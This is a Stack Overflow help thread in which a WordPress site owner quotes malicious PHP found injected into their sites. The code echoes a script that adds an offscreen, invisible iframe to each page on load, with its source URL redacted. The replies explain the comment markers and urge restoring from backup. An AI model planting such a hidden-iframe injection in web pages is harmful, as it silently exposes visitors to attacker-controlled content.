# Hacked on a WordPress Site What is this do #c3284d#

Tags: php, linux, wordpress, apache, ftp

> **Possible Duplicate:**
>   [Clean server infected with c3284d virus, using search and replace](https://stackoverflow.com/questions/11490744/clean-server-infected-with-c3284d-virus-using-search-and-replace)

Found this script on several of my sites today, I know what the script does but what do the hashed out things do? It affects the ftp tool? I am not able to down load the files that contain the content? Is this a server sided issue? The theme I am using is Dynamix is there known holes in that theme or am I correct in thinking it is my host? 
Why is the file not able to be downloaded or edited through ftp?

```
#c3284d#
echo "<script type=\"text/javascript\">
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src  = \"***redacted***\";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
 };
 window.onload = frmAdd;
 </script>
";
 #/c3284d#
```

I have backups of the site so i am not interested in searching and replacing everything! because like a user said clean one error and there is many more that show up!

Comment: Your site has been compromised. Please recover from backup immediately. I have edited your post and redacted the link.

Answer (score 1):

Hash in php is equivalant to `//`
so it is just a comment

they probably parse your page and look for that value and take everything in between.